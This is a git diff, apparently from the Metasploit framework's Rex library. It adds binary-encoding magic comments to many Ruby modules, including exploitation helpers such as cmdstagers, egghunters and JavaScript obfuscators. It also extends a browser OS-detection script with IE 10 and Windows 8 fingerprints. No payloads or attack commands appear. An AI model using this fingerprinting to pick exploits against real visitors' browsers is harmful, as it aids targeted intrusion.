+++ b/lib/rex/encoding/xor/dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/dword.rb.ut.rb b/lib/rex/encoding/xor/dword.rb.ut.rb
index 819db54c09..b4380ba1da 100644
--- a/lib/rex/encoding/xor/dword.rb.ut.rb
+++ b/lib/rex/encoding/xor/dword.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/dword_additive.rb b/lib/rex/encoding/xor/dword_additive.rb
index ec9ee0f7a1..0107cb115d 100644
--- a/lib/rex/encoding/xor/dword_additive.rb
+++ b/lib/rex/encoding/xor/dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/exceptions'
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/dword_additive.rb.ut.rb b/lib/rex/encoding/xor/dword_additive.rb.ut.rb
index ef398a92c2..c26d7600fb 100644
--- a/lib/rex/encoding/xor/dword_additive.rb.ut.rb
+++ b/lib/rex/encoding/xor/dword_additive.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/exceptions.rb b/lib/rex/encoding/xor/exceptions.rb
index 883a7aa9e7..fa1e4b659b 100644
--- a/lib/rex/encoding/xor/exceptions.rb
+++ b/lib/rex/encoding/xor/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Encoding
diff --git a/lib/rex/encoding/xor/generic.rb b/lib/rex/encoding/xor/generic.rb
index 89a35238b3..6a1c538a0d 100644
--- a/lib/rex/encoding/xor/generic.rb
+++ b/lib/rex/encoding/xor/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/exceptions'
require 'rex/text'
diff --git a/lib/rex/encoding/xor/generic.rb.ut.rb b/lib/rex/encoding/xor/generic.rb.ut.rb
index 3ac2f7d92c..2088a1a46a 100644
--- a/lib/rex/encoding/xor/generic.rb.ut.rb
+++ b/lib/rex/encoding/xor/generic.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/qword.rb b/lib/rex/encoding/xor/qword.rb
index 323232a71b..f4fc38eca0 100644
--- a/lib/rex/encoding/xor/qword.rb
+++ b/lib/rex/encoding/xor/qword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/word.rb b/lib/rex/encoding/xor/word.rb
index a3b9d5c6e3..2ceff262eb 100644
--- a/lib/rex/encoding/xor/word.rb
+++ b/lib/rex/encoding/xor/word.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/word.rb.ut.rb b/lib/rex/encoding/xor/word.rb.ut.rb
index a7b1918c95..56e138c818 100644
--- a/lib/rex/encoding/xor/word.rb.ut.rb
+++ b/lib/rex/encoding/xor/word.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/exceptions.rb b/lib/rex/exceptions.rb
index a4ca4ef80d..f253207eb1 100644
--- a/lib/rex/exceptions.rb
+++ b/lib/rex/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
diff --git a/lib/rex/exceptions.rb.ut.rb b/lib/rex/exceptions.rb.ut.rb
index 61963da29d..9ecb02b848 100644
--- a/lib/rex/exceptions.rb.ut.rb
+++ b/lib/rex/exceptions.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/exploitation/cmdstager.rb b/lib/rex/exploitation/cmdstager.rb
index 75a68b2fe3..298976ec9e 100644
--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/cmdstager/base.rb b/lib/rex/exploitation/cmdstager/base.rb
index fa6eab8fd7..d5eaf90ff7 100644
--- a/lib/rex/exploitation/cmdstager/base.rb
+++ b/lib/rex/exploitation/cmdstager/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
diff --git a/lib/rex/exploitation/cmdstager/debug_asm.rb b/lib/rex/exploitation/cmdstager/debug_asm.rb
index 05a68f8a16..92d1aae809 100644
--- a/lib/rex/exploitation/cmdstager/debug_asm.rb
+++ b/lib/rex/exploitation/cmdstager/debug_asm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: debug_asm.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/cmdstager/debug_write.rb b/lib/rex/exploitation/cmdstager/debug_write.rb
index cf5438036c..1d0fdbc8d7 100644
--- a/lib/rex/exploitation/cmdstager/debug_write.rb
+++ b/lib/rex/exploitation/cmdstager/debug_write.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: debug_write.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb
index d389d95e61..130ad91999 100644
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/cmdstager/vbs.rb b/lib/rex/exploitation/cmdstager/vbs.rb
index 920c7e7847..a699ad3820 100644
--- a/lib/rex/exploitation/cmdstager/vbs.rb
+++ b/lib/rex/exploitation/cmdstager/vbs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: vbs.rb 12595 2011-05-12 18:33:49Z jduck $
##
diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb
index 8d2d676869..f65545a67b 100644
--- a/lib/rex/exploitation/egghunter.rb
+++ b/lib/rex/exploitation/egghunter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'metasm'
diff --git a/lib/rex/exploitation/egghunter.rb.ut.rb b/lib/rex/exploitation/egghunter.rb.ut.rb
index bf1808c0e4..1aac3151c0 100644
--- a/lib/rex/exploitation/egghunter.rb.ut.rb
+++ b/lib/rex/exploitation/egghunter.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/encryptjs.rb b/lib/rex/exploitation/encryptjs.rb
index a270f5ffd9..783682e799 100644
--- a/lib/rex/exploitation/encryptjs.rb
+++ b/lib/rex/exploitation/encryptjs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Exploitation
diff --git a/lib/rex/exploitation/heaplib.rb b/lib/rex/exploitation/heaplib.rb
index e070034cfa..a82cbfddc6 100644
--- a/lib/rex/exploitation/heaplib.rb
+++ b/lib/rex/exploitation/heaplib.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/jsobfu'
diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js
index 7a6e8e0d46..cb1148247a 100644
--- a/lib/rex/exploitation/javascriptosdetect.js
+++ b/lib/rex/exploitation/javascriptosdetect.js
@@ -123,7 +123,8 @@ window.os_detect.getVersion = function(){
break;
}
}
- } else if (typeof window.onmousewheel != 'undefined') {
+ } else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
+
// Then this is webkit, could be Safari or Chrome.
// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
@@ -243,6 +244,7 @@ window.os_detect.getVersion = function(){
case "Windows NT 5.2": os_flavor = "2003"; break;
case "Windows NT 6.0": os_flavor = "Vista"; break;
case "Windows NT 6.1": os_flavor = "7"; break;
+ case "Windows NT 6.2": os_flavor = "8"; break;
}
}
if (version.match(/Linux/)) {
@@ -782,7 +784,19 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
-
+ case "9016446":
+ // IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
+ // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
+ os_flavor = "7";
+ ua_version = "9.0";
+ os_sp = "SP1";
+ break;
+ case "1000":
+ // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
+ ua_version = "10.0";
+ os_flavor = "8";
+ os_sp = "SP0";
+ break;
default:
unknown_fingerprint = version;
break;
@@ -847,6 +861,7 @@ window.os_detect.getVersion = function(){
else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; }
else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; }
+ else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; }
}
if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) {
if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; }
diff --git a/lib/rex/exploitation/javascriptosdetect.rb b/lib/rex/exploitation/javascriptosdetect.rb
index 686e681e0a..c481ffda18 100644
--- a/lib/rex/exploitation/javascriptosdetect.rb
+++ b/lib/rex/exploitation/javascriptosdetect.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb
index ead60d4b1d..844d9f8e64 100644
--- a/lib/rex/exploitation/jsobfu.rb
+++ b/lib/rex/exploitation/jsobfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/exploitation/obfuscatejs.rb b/lib/rex/exploitation/obfuscatejs.rb
index e00fd677e2..94e17c06dc 100644
--- a/lib/rex/exploitation/obfuscatejs.rb
+++ b/lib/rex/exploitation/obfuscatejs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
module Rex
module Exploitation
diff --git a/lib/rex/exploitation/omelet.rb b/lib/rex/exploitation/omelet.rb
index 6147949f73..7321c836d8 100644
--- a/lib/rex/exploitation/omelet.rb
+++ b/lib/rex/exploitation/omelet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'metasm'
diff --git a/lib/rex/exploitation/omelet.rb.ut.rb b/lib/rex/exploitation/omelet.rb.ut.rb
index 09d6b14c69..f82fff22bd 100644
--- a/lib/rex/exploitation/omelet.rb.ut.rb
+++ b/lib/rex/exploitation/omelet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/opcodedb.rb b/lib/rex/exploitation/opcodedb.rb
index 4b948994f1..2dcca7c5ae 100644
--- a/lib/rex/exploitation/opcodedb.rb
+++ b/lib/rex/exploitation/opcodedb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/rexml'
require 'rexml/source'
require 'rexml/document'
diff --git a/lib/rex/exploitation/opcodedb.rb.ut.rb b/lib/rex/exploitation/opcodedb.rb.ut.rb
index 29610fdae0..828fd3bb49 100644
--- a/lib/rex/exploitation/opcodedb.rb.ut.rb
+++ b/lib/rex/exploitation/opcodedb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/exploitation/seh.rb b/lib/rex/exploitation/seh.rb
index 11c93e32bc..574c0923c2 100644
--- a/lib/rex/exploitation/seh.rb
+++ b/lib/rex/exploitation/seh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch/x86'
diff --git a/lib/rex/exploitation/seh.rb.ut.rb b/lib/rex/exploitation/seh.rb.ut.rb
index 54e6be0af2..d896fd22f3 100644
--- a/lib/rex/exploitation/seh.rb.ut.rb
+++ b/lib/rex/exploitation/seh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/file.rb b/lib/rex/file.rb
index 6903be34de..99e82c40c0 100644
--- a/lib/rex/file.rb
+++ b/lib/rex/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'find'
require 'rex/compat'
require 'tempfile'
diff --git a/lib/rex/file.rb.ut.rb b/lib/rex/file.rb.ut.rb
index e4e07fed4d..0a6ad15214 100644
--- a/lib/rex/file.rb.ut.rb
+++ b/lib/rex/file.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb
index a3fb39088b..1cf4a94a8d 100644
--- a/lib/rex/image_source.rb
+++ b/lib/rex/image_source.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb
index 6338c987fa..4a4a8b62c8 100644
--- a/lib/rex/image_source/disk.rb
+++ b/lib/rex/image_source/disk.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb
index e6ef98e014..9f2456cd43 100644
--- a/lib/rex/image_source/image_source.rb
+++ b/lib/rex/image_source/image_source.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb
index cc9bdae342..c75be1881f 100644
--- a/lib/rex/image_source/memory.rb
+++ b/lib/rex/image_source/memory.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/io/bidirectional_pipe.rb b/lib/rex/io/bidirectional_pipe.rb
index 1fd55d5210..d85a7d40ae 100644
--- a/lib/rex/io/bidirectional_pipe.rb
+++ b/lib/rex/io/bidirectional_pipe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module IO
diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb
index 19ea97132c..5fa926ff28 100644
--- a/lib/rex/io/datagram_abstraction.rb
+++ b/lib/rex/io/datagram_abstraction.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
diff --git a/lib/rex/io/ring_buffer.rb b/lib/rex/io/ring_buffer.rb
index d4d7feea05..85f7e7ca5b 100644
--- a/lib/rex/io/ring_buffer.rb
+++ b/lib/rex/io/ring_buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This class implements a ring buffer with "cursors" in the form of sequence numbers.
# To use this class, pass in a file descriptor and a ring size, the class will read
diff --git a/lib/rex/io/ring_buffer.rb.ut.rb b/lib/rex/io/ring_buffer.rb.ut.rb
index a49420fce3..e436a9cbc9 100644
--- a/lib/rex/io/ring_buffer.rb.ut.rb
+++ b/lib/rex/io/ring_buffer.rb.ut.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/io/stream.rb b/lib/rex/io/stream.rb
index ebe72d0e78..a7dffc368b 100644
--- a/lib/rex/io/stream.rb
+++ b/lib/rex/io/stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync/thread_safe'
module Rex
diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb
index e71100f9d9..6fed32d12f 100644
--- a/lib/rex/io/stream_abstraction.rb
+++ b/lib/rex/io/stream_abstraction.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
require 'fcntl'
diff --git a/lib/rex/io/stream_server.rb b/lib/rex/io/stream_server.rb
index e32082dea1..8ed10692bb 100644
--- a/lib/rex/io/stream_server.rb
+++ b/lib/rex/io/stream_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/job_container.rb b/lib/rex/job_container.rb
index c6c067d231..cda3afd3ea 100644
--- a/lib/rex/job_container.rb
+++ b/lib/rex/job_container.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/logging.rb b/lib/rex/logging.rb
index 51bb2b97da..0a64633264 100644
--- a/lib/rex/logging.rb
+++ b/lib/rex/logging.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/constants' # for LEV_'s
require 'rex/logging/log_dispatcher'
diff --git a/lib/rex/logging/log_dispatcher.rb b/lib/rex/logging/log_dispatcher.rb
index 6a4b55eeb6..c31130fe17 100644
--- a/lib/rex/logging/log_dispatcher.rb
+++ b/lib/rex/logging/log_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync'
require 'rex/logging/log_sink'
diff --git a/lib/rex/logging/log_sink.rb b/lib/rex/logging/log_sink.rb
index 57afaa56f5..e141800b5b 100644
--- a/lib/rex/logging/log_sink.rb
+++ b/lib/rex/logging/log_sink.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/constants'
module Rex
diff --git a/lib/rex/logging/sinks/flatfile.rb b/lib/rex/logging/sinks/flatfile.rb
index d57919092d..3c9d1627fc 100644
--- a/lib/rex/logging/sinks/flatfile.rb
+++ b/lib/rex/logging/sinks/flatfile.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Logging
module Sinks
diff --git a/lib/rex/logging/sinks/stderr.rb b/lib/rex/logging/sinks/stderr.rb
index 253938ad42..3ed78801fc 100644
--- a/lib/rex/logging/sinks/stderr.rb
+++ b/lib/rex/logging/sinks/stderr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Logging
module Sinks
diff --git a/lib/rex/machparsey.rb b/lib/rex/machparsey.rb
index fc47aefc9a..ca4a21e06f 100644
--- a/lib/rex/machparsey.rb
+++ b/lib/rex/machparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachParsey
diff --git a/lib/rex/machparsey/exceptions.rb b/lib/rex/machparsey/exceptions.rb
index 6e53959204..4a18c80fbe 100644
--- a/lib/rex/machparsey/exceptions.rb
+++ b/lib/rex/machparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachParsey
diff --git a/lib/rex/machparsey/mach.rb b/lib/rex/machparsey/mach.rb
index 46eca14c65..bcb2abdefd 100644
--- a/lib/rex/machparsey/mach.rb
+++ b/lib/rex/machparsey/mach.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/machparsey/machbase'
require 'rex/machparsey/exceptions'
diff --git a/lib/rex/machparsey/machbase.rb b/lib/rex/machparsey/machbase.rb
index 85068c360c..46387daf23 100644
--- a/lib/rex/machparsey/machbase.rb
+++ b/lib/rex/machparsey/machbase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/struct2'
diff --git a/lib/rex/machscan.rb b/lib/rex/machscan.rb
index a6ce1b0cd7..a46745d53f 100644
--- a/lib/rex/machscan.rb
+++ b/lib/rex/machscan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachScan
diff --git a/lib/rex/machscan/scanner.rb b/lib/rex/machscan/scanner.rb
index 59bdbeebba..2442e581ee 100644
--- a/lib/rex/machscan/scanner.rb
+++ b/lib/rex/machscan/scanner.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module MachScan
diff --git a/lib/rex/mime.rb b/lib/rex/mime.rb
index 57498c2f54..840b4ab2bc 100644
--- a/lib/rex/mime.rb
+++ b/lib/rex/mime.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
diff --git a/lib/rex/mime/header.rb b/lib/rex/mime/header.rb
index 399a230066..469138d3c3 100644
--- a/lib/rex/mime/header.rb
+++ b/lib/rex/mime/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Header
diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb
index b5c39be0c2..a8a3d7d471 100644
--- a/lib/rex/mime/message.rb
+++ b/lib/rex/mime/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Message
diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb
index ed00fb82c0..143a1c8de0 100644
--- a/lib/rex/mime/part.rb
+++ b/lib/rex/mime/part.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module MIME
class Part
diff --git a/lib/rex/nop/opty2.rb b/lib/rex/nop/opty2.rb
index 187e558b60..6a56521dea 100644
--- a/lib/rex/nop/opty2.rb
+++ b/lib/rex/nop/opty2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/arch/x86'
require 'rex/nop/opty2_tables'
diff --git a/lib/rex/nop/opty2.rb.ut.rb b/lib/rex/nop/opty2.rb.ut.rb
index b670e59b55..5fe9da764b 100644
--- a/lib/rex/nop/opty2.rb.ut.rb
+++ b/lib/rex/nop/opty2.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/nop/opty2_tables.rb b/lib/rex/nop/opty2_tables.rb
index 632a04eda5..65f03ae52d 100644
--- a/lib/rex/nop/opty2_tables.rb
+++ b/lib/rex/nop/opty2_tables.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Nop
diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb
index 20cdb7a5bc..d2a0407134 100644
--- a/lib/rex/ole.rb
+++ b/lib/rex/ole.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb
index 4158205467..e697dd121d 100644
--- a/lib/rex/ole/clsid.rb
+++ b/lib/rex/ole/clsid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb
index ac48e0102e..52ab121b4c 100644
--- a/lib/rex/ole/difat.rb
+++ b/lib/rex/ole/difat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb
index 9ea03ffefc..6f43c71f44 100644
--- a/lib/rex/ole/directory.rb
+++ b/lib/rex/ole/directory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb
index 6f2e3aa339..c6f634691a 100644
--- a/lib/rex/ole/direntry.rb
+++ b/lib/rex/ole/direntry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb
index 827ce17465..2edb3de8ac 100644
--- a/lib/rex/ole/fat.rb
+++ b/lib/rex/ole/fat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb
index 478c086c69..b24eef4e31 100644
--- a/lib/rex/ole/header.rb
+++ b/lib/rex/ole/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb
index a5251771ca..1e9bbdb0e3 100644
--- a/lib/rex/ole/minifat.rb
+++ b/lib/rex/ole/minifat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb
index 2f2e50cbf2..8a1812d96c 100644
--- a/lib/rex/ole/propset.rb
+++ b/lib/rex/ole/propset.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/samples/create_ole.rb b/lib/rex/ole/samples/create_ole.rb
index f85784020b..52f968075b 100755
--- a/lib/rex/ole/samples/create_ole.rb
+++ b/lib/rex/ole/samples/create_ole.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/dir.rb b/lib/rex/ole/samples/dir.rb
index 8cd7408a01..6bac03a4b1 100755
--- a/lib/rex/ole/samples/dir.rb
+++ b/lib/rex/ole/samples/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/dump_stream.rb b/lib/rex/ole/samples/dump_stream.rb
index 47b2b42a52..aea1b57940 100755
--- a/lib/rex/ole/samples/dump_stream.rb
+++ b/lib/rex/ole/samples/dump_stream.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/samples/ole_info.rb b/lib/rex/ole/samples/ole_info.rb
index f221f71390..5f0eb3dcff 100755
--- a/lib/rex/ole/samples/ole_info.rb
+++ b/lib/rex/ole/samples/ole_info.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb
index cb532f3d49..55f6259a60 100644
--- a/lib/rex/ole/storage.rb
+++ b/lib/rex/ole/storage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb
index 34d887d83f..fd7e36d050 100644
--- a/lib/rex/ole/stream.rb
+++ b/lib/rex/ole/stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb
index de3c3bc62b..1e14440853 100644
--- a/lib/rex/ole/substorage.rb
+++ b/lib/rex/ole/substorage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb
index 890b88cb33..5712e598c8 100644
--- a/lib/rex/ole/util.rb
+++ b/lib/rex/ole/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
# Version: $Revision$
diff --git a/lib/rex/parser/acunetix_nokogiri.rb b/lib/rex/parser/acunetix_nokogiri.rb
index e102a5f4c4..2700b5d98b 100644
--- a/lib/rex/parser/acunetix_nokogiri.rb
+++ b/lib/rex/parser/acunetix_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
require 'rex'
require 'uri'
diff --git a/lib/rex/parser/apple_backup_manifestdb.rb b/lib/rex/parser/apple_backup_manifestdb.rb
index fca355968f..38b08510cc 100644
